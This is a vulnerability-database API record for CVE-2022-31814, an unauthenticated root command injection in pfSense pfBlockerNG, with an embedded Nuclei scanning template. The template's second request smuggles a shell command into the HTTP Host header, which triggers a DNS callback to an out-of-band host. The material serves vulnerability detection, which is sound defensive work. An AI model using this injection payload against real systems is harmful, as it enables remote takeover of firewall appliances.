{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-31814/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-31814/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-31814/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-31814/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-31814/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-31814"},"sightings":{"href":"/api/v1/sightings/cve-2022-31814"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-31814.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-31814\n\ninfo:\n  name: pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection\n  author: EvergreenCartoons\n  severity: critical\n  description: |\n    pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n  remediation: |\n    Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability.\n  reference:\n    - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/\n    - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html\n    - https://github.com/EvergreenCartoons/SenselessViolence\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-31814\n    - http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-31814\n    cwe-id: CWE-78\n    epss-score: 0.91881\n    epss-percentile: 0.99816\n    cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: netgate\n    product: pfblockerng\n    framework: pfsense\n  tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate,vkev,vuln\n\nhttp:\n  - raw:\n      - |+\n        GET /pfblockerng/www/index.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n      - |+\n        GET /pfblockerng/www/index.php HTTP/1.1\n        Host: ' *; host {{interactsh-url}}; '\n        Accept: */*\n\n    unsafe: true\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body_1, \"GIF\")'\n\n      - type: word\n        part: interactsh_protocol # Confirms the DNS Interaction\n        words:\n          - \"dns\"\n# digest: 4b0a00483046022100d004e321590f65ef5cac301f13dc73b3c2d3f69793e8066104a08a3e7206670c02210081bbb15f5e23f055640ba1d9c1c34a4254e6a7a992f0bad4092d0f1c86bba87f:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-31814"}